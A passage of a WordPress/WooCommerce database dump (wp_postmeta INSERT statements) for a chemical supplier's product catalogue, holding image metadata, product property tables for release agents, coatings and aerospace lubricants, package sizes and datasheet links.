INSERT INTO `wp_postmeta` VALUES (4400, 626, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:275;s:6:"height";i:114;s:4:"file";s:34:"2016/08/milsolv-e1471624745570.png";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"milsolv-e1471624745570-250x114.png";s:5:"width";i:250;s:6:"height";i:114;s:9:"mime-type";s:9:"image/png";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"milsolv-e1471624745570-200x114.png";s:5:"width";i:200;s:6:"height";i:114;s:9:"mime-type";s:9:"image/png";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"milsolv-e1471624745570-225x114.png";s:5:"width";i:225;s:6:"height";i:114;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4401, 626, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:275;s:6:"height";i:114;s:4:"file";s:11:"milsolv.png";}}'); 
INSERT INTO `wp_postmeta` VALUES (4402, 627, '_wp_attached_file', '2016/08/milglide-e1471624768465.png'); 
INSERT INTO `wp_postmeta` VALUES (4403, 627, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:275;s:6:"height";i:114;s:4:"file";s:35:"2016/08/milglide-e1471624768465.png";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:35:"milglide-e1471624768465-250x114.png";s:5:"width";i:250;s:6:"height";i:114;s:9:"mime-type";s:9:"image/png";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"milglide-e1471624768465-200x114.png";s:5:"width";i:200;s:6:"height";i:114;s:9:"mime-type";s:9:"image/png";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"milglide-e1471624768465-225x114.png";s:5:"width";i:225;s:6:"height";i:114;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4404, 627, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:275;s:6:"height";i:114;s:4:"file";s:12:"milglide.png";}}'); 
INSERT INTO `wp_postmeta` VALUES (4405, 630, '_wp_attached_file', '2016/08/Epon-resin.jpg'); 
INSERT INTO `wp_postmeta` VALUES (4406, 630, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3744;s:4:"file";s:22:"2016/08/Epon-resin.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"Epon-resin-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"Epon-resin-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"Epon-resin-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"Epon-resin-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"Epon-resin-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"Epon-resin-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"Epon-resin-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:22:"Epon-resin-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (4407, 490, '_thumbnail_id', '630'); 
INSERT INTO `wp_postmeta` VALUES (4408, 423, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (4409, 441, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (4410, 579, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (4412, 290, '312_default_editor', '<strong>Physical Properties:</strong>\r\n<table style="height: 84px;" width="378">\r\n<tbody>\r\n<tr>\r\n<td width="111">Primary Polymer</td>\r\n<td width="159">Thermoset Polysiloxane</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td>White Emulsion</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td>None</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td>1.0 g/mL</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point</td>\r\n<td>None</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (4413, 290, '317_default_editor', '1 Gallon, 5 Gallon, and 55 Gallon drum'); 
INSERT INTO `wp_postmeta` VALUES (4414, 290, '318_custom_list_file', 'a:2:{s:32:"8b403ff0d56eb0cf1730d05f7c688120";a:3:{s:4:"name";s:13:"ReleaSys 8800";s:4:"file";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-8800-1.pdf";s:4:"desc";s:17:"ReleaSys 8800-TDS";}s:32:"5baf288c8bd4aacbcf343e800fd12a34";a:3:{s:4:"name";s:25:"ReleaSys Product Overview";s:4:"file";s:89:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-Product-Guide-1.pdf";s:4:"desc";s:25:"ReleaSys Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (4415, 290, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4416, 290, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4417, 290, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (4418, 290, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (4419, 290, '_ywtm_content_tab_description', '<strong>Physical Properties:</strong>\r\nPrimary Polymer:…...Thermoset Polysiloxane\r\nAppearance:………...White Emulsion\r\nOdor:…………………None\r\nSpecific Gravity:…….1.0 g/mL @ 25°C\r\nFlash Point…………..None\r\n\r\n<strong>Release Agent Applications:</strong>\r\n\r\nReleaSys 8800 is formulated to provide unmatched utility in compression, injection and transfer molding with the following materials\r\n<table style="height: 153px;" width="464">\r\n<tbody>\r\n<tr>\r\n<td width="167">•          Organic Polymer</td>\r\n<td width="168">•          Thermoplastics</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Thermo-Resins</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Fluoroelastomers</td>\r\n<td width="168">•          EPDM</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Acrylics</td>\r\n<td width="168">•          Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Neoprene</td>\r\n<td width="168"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4420, 290, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4421, 290, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4422, 290, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4423, 290, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4424, 621, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (4425, 637, '_edit_lock', '1479958632:3'); 
INSERT INTO `wp_postmeta` VALUES (4426, 637, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (4427, 637, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (4428, 637, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (4429, 637, '312_default_editor', '<strong><u>Cured Electrical Properties</u></strong>\r\n<table style="height: 169px;" width="356">\r\n<tbody>\r\n<tr>\r\n<td>Dielectric Strength, volts/mil</td>\r\n<td>2000</td>\r\n</tr>\r\n<tr>\r\n<td>Dielectric Constant @ 100 kHz (77°F/25°C)</td>\r\n<td>2.29</td>\r\n</tr>\r\n<tr>\r\n<td>Dissipation Factor@ 100 kHz (77°F/25°C)</td>\r\n<td>0.012</td>\r\n</tr>\r\n<tr>\r\n<td>Volume Resistivity, volts/mil @ (77°F/25°C)</td>\r\n<td>1.04x10(16)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><u>Cured Physical Properties (per MIL-I-46058C</u></strong><strong><u>)</u></strong>\r\n\r\n<strong>Operating Temperature: </strong>-67°F/-55°C to 230°F/110°C\r\n<strong>Appearance:</strong> No blistering, wrinkling, cracking or peeling of film or discoloration of printed conductors or substrate after thermal shock or moisture resistance testing.\r\n<strong>Flexibility:</strong> No cracking or crazing of film in bending over a 1/8" diameter mandrel.\r\n<strong>Fungus Resistance:</strong> Non-nutrient per ASTM G21.\r\n<strong>Fluorescent:</strong> when viewed with ultraviolet light.'); 
INSERT INTO `wp_postmeta` VALUES (4430, 637, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon drum'); 
INSERT INTO `wp_postmeta` VALUES (4431, 637, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4432, 637, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4433, 637, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4434, 637, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4435, 637, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (4436, 637, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4437, 637, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (4438, 637, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (4439, 637, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (4440, 637, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (4441, 637, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4442, 637, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4443, 637, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4444, 637, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4445, 637, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (4446, 637, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (4447, 637, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4448, 637, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (4449, 637, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4450, 637, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4451, 637, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (4452, 637, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4453, 637, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4454, 637, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (4455, 637, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4456, 637, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4457, 637, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4458, 637, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4459, 637, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (4460, 637, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (4461, 638, '_edit_lock', '1503077337:2'); 
INSERT INTO `wp_postmeta` VALUES (4462, 638, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (4463, 638, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (4464, 638, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (4465, 638, '312_default_editor', '<table width="1214">\r\n<tbody>\r\n<tr>\r\n<td width="202">Aerospace Grade</td>\r\n<td style="text-align: center;" width="224">240AZ</td>\r\n<td style="text-align: center;" width="241">240AA</td>\r\n<td style="text-align: center;" width="213">240AB</td>\r\n<td style="text-align: center;" width="167">240AC</td>\r\n<td style="text-align: center;" width="167">240AD</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 20°C</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">88</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">800</td>\r\n<td style="text-align: center;">1540</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Viscosity @ 38°C</td>\r\n<td style="text-align: center;">24.7</td>\r\n<td style="text-align: center;">35</td>\r\n<td style="text-align: center;">86</td>\r\n<td style="text-align: center;">270</td>\r\n<td style="text-align: center;">502</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 99°C</td>\r\n<td style="text-align: center;">4.2</td>\r\n<td style="text-align: center;">5.4</td>\r\n<td style="text-align: center;">10.5</td>\r\n<td style="text-align: center;">26</td>\r\n<td style="text-align: center;">44</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-57-149)</td>\r\n<td style="text-align: center;">(-51-177)</td>\r\n<td style="text-align: center;">(-40-232)</td>\r\n<td style="text-align: center;">(-34-288)</td>\r\n<td style="text-align: center;">(-29-316)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4466, 638, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td width="125">\r\n<p style="text-align: center;">Pail</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4467, 638, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4468, 638, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4469, 638, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4470, 638, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4471, 638, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (4472, 638, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4473, 638, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (4474, 638, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (4475, 638, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (4476, 638, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (4477, 638, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4478, 638, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4479, 638, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4480, 638, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4481, 638, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (4482, 638, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (4483, 638, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4484, 638, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (4485, 638, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4486, 638, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4487, 638, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (4488, 638, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4489, 638, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4490, 638, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (4491, 638, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4492, 638, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4493, 638, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4494, 638, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4495, 638, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (4496, 638, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (4498, 638, '318_custom_list_file', 'a:1:{s:32:"7fe2e32ab19d9b3df8ef39d068d1e492";a:3:{s:4:"name";s:13:"Aerospace PDF";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4499, 642, '_edit_lock', '1503320409:2'); 
INSERT INTO `wp_postmeta` VALUES (4500, 642, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (4501, 642, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (4502, 642, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (4503, 642, '312_default_editor', '<table width="1214">\r\n<tbody>\r\n<tr>\r\n<td width="202">Aerospace Grade</td>\r\n<td style="text-align: center;" width="224">240AZ</td>\r\n<td style="text-align: center;" width="241">240AA</td>\r\n<td style="text-align: center;" width="213">240AB</td>\r\n<td style="text-align: center;" width="167">240AC</td>\r\n<td style="text-align: center;" width="167">240AD</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 20°C</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">88</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">800</td>\r\n<td style="text-align: center;">1540</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Viscosity @ 38°C</td>\r\n<td style="text-align: center;">24.7</td>\r\n<td style="text-align: center;">35</td>\r\n<td style="text-align: center;">86</td>\r\n<td style="text-align: center;">270</td>\r\n<td style="text-align: center;">502</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 99°C</td>\r\n<td style="text-align: center;">4.2</td>\r\n<td style="text-align: center;">5.4</td>\r\n<td style="text-align: center;">10.5</td>\r\n<td style="text-align: center;">26</td>\r\n<td style="text-align: center;">44</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-57-149)</td>\r\n<td style="text-align: center;">(-51-177)</td>\r\n<td style="text-align: center;">(-40-232)</td>\r\n<td style="text-align: center;">(-34-288)</td>\r\n<td style="text-align: center;">(-29-316)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4504, 642, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td width="125">\r\n<p style="text-align: center;">Pail</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4505, 642, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4506, 642, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4507, 642, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4508, 642, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (4509, 642, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4510, 642, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (4511, 642, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (4512, 642, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (4513, 642, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (4514, 642, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4515, 642, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4516, 642, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4517, 642, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (4518, 642, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (4519, 642, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (4520, 642, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (4521, 642, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4522, 642, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4523, 642, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (4524, 642, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4525, 642, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (4526, 642, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (4527, 642, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4528, 642, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (4529, 642, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (4530, 642, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (4531, 642, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (4532, 642, '318_custom_list_file', 'a:1:{s:32:"7fe2e32ab19d9b3df8ef39d068d1e492";a:3:{s:4:"name";s:13:"Aerospace PDF";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-PDF.pdf";s:4:"desc";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (4562, 642, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (4563, 642, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (4564, 643, '_edit_lock', '1503077789:2'); 
INSERT INTO `wp_postmeta` VALUES (4565, 643, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (4566, 643, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (4567, 643, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (4568, 643, '312_default_editor', '<table width="1214">\r\n<tbody>\r\n<tr>\r\n<td width="202">Aerospace Grade</td>\r\n<td style="text-align: center;" width="224">240AZ</td>\r\n<td style="text-align: center;" width="241">240AA</td>\r\n<td style="text-align: center;" width="213">240AB</td>\r\n<td style="text-align: center;" width="167">240AC</td>\r\n<td style="text-align: center;" width="167">240AD</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 20°C</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">88</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">800</td>\r\n<td style="text-align: center;">1540</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Viscosity @ 38°C</td>\r\n<td style="text-align: center;">24.7</td>\r\n<td style="text-align: center;">35</td>\r\n<td style="text-align: center;">86</td>\r\n<td style="text-align: center;">270</td>\r\n<td style="text-align: center;">502</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity @ 99°C</td>\r\n<td style="text-align: center;">4.2</td>\r\n<td style="text-align: center;">5.4</td>\r\n<td style="text-align: center;">10.5</td>\r\n<td style="text-align: center;">26</td>\r\n<td style="text-align: center;">44</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-57-149)</td>\r\n<td style="text-align: center;">(-51-177)</td>\r\n<td style="text-align: center;">(-40-232)</td>\r\n<td style="text-align: center;">(-34-288)</td>\r\n<td style="text-align: center;">(-29-316)</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (4569, 643, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td width="125">\r\n<p style="text-align: center;">Pail</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 